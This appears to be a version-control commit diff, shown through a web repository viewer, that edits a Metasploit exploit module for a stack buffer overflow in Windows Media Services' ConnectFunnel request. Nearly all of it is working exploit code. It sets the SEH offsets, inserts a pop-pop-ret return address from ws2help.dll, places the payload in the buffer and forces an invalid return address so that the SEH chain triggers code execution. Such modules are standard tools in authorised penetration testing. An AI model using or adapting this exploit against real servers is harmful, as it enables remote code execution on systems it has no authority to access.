change exit func and ensure return is invalid (causes exception)
git-svn-id: file:///home/svn/framework3/trunk@9162 4d416f70-5f16-0410-b530-b9f4589650daunstable
Joshua Drake
parent
7a0e2f11af
commit
8a0785f91e
|
|
@ -19,13 +19,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
super(update_info(info,
|
||||
'Name' => 'Windows Media Services ConnectFunnel Stack Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in the Windows Media
|
||||
This module exploits a stack buffer overflow in the Windows Media
|
||||
Unicast Service version 4.1.0.3930 (NUMS.exe). By sending a specially
|
||||
crafted FunnelConnect request, an attacker can execute arbitrary code
|
||||
under the "NetShowServices" user account. Windows Media Services 4.1 ships
|
||||
with Windows 2000 Server, but is not installed by default.
|
||||
|
||||
NOTE: This service does NOT restart automatically. Successful, as well as
|
||||
NOTE: This service does NOT restart automatically. Successful, as well as
|
||||
unsuccessful exploitation attempts will kill the service which prevents
|
||||
additional attempts.
|
||||
},
|
||||
|
|
@ -41,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
'EXITFUNC' => 'process',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
|
|
@ -60,10 +60,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# "Patched":
|
||||
# SEH handler offset is 832
|
||||
'Offset' => 840,
|
||||
'Offsets' => [ 832, 840 ],
|
||||
'SEHOffsets' => [ 832, 840 ],
|
||||
'EIPOffset' => 652+3,
|
||||
'Ret' => 0x75022ac4 # p/p/r in ws2help.dll
|
||||
}
|
||||
],
|
||||
}
|
||||
],
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Apr 13 2010',
|
||||
|
|
@ -88,7 +89,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
cmd_buf << make_command(0x30001, subscriber)
|
||||
|
||||
# LinkViewerToMacConnectFunnel
|
||||
#name = Rex::Text.pattern_create(512)
|
||||
name = ''
|
||||
name << "\\\\"
|
||||
name << rand_text((target['Offset'] + 4 + 5) / 2)
|
||||
|
|
@ -97,12 +97,15 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
# Convert it to Unicode..
|
||||
name = Rex::Text.to_unicode(name)
|
||||
stuff = Rex::Text.pattern_create((target['Offset'] + 4 + 5) + 4)
|
||||
stuff.slice!(0,4)
|
||||
name[4,stuff.length] = stuff
|
||||
|
||||
# Insert the return address..
|
||||
# Insert the payload..
|
||||
name[4,payload.encoded.length] = payload.encoded
|
||||
|
||||
# Build the SEH frame that leads to the payload...
|
||||
target['Offsets'].each { |off|
|
||||
target['SEHOffsets'].each { |off|
|
||||
seh = ''
|
||||
case off
|
||||
when 832
|
||||
|
|
@ -120,6 +123,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
name[off,seh.length] = seh
|
||||
}
|
||||
|
||||
# Make sure the return address points at an invalid address
|
||||
off = target['EIPOffset']
|
||||
name[off,1] = [0x80 + rand(0x7f)].pack('C')
|
||||
|
||||
# Add it to the command buffer..
|
||||
cmd_buf << make_command(0x30002, name)
|
||||
|
||||
|
|
@ -144,7 +151,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# The server doesn't like packets that are bigger...
|
||||
raise RuntimeError, 'Length too big' if (len > 0x1000)
|
||||
len /= 8
|
||||
|
||||
|
||||
# Pack the pieces in ...
|
||||
pkt = [
|
||||
1,0,0,0, # rep, ver, verMinor, pad
|
||||
|
|
|
|||
Loading…
Reference in New Issue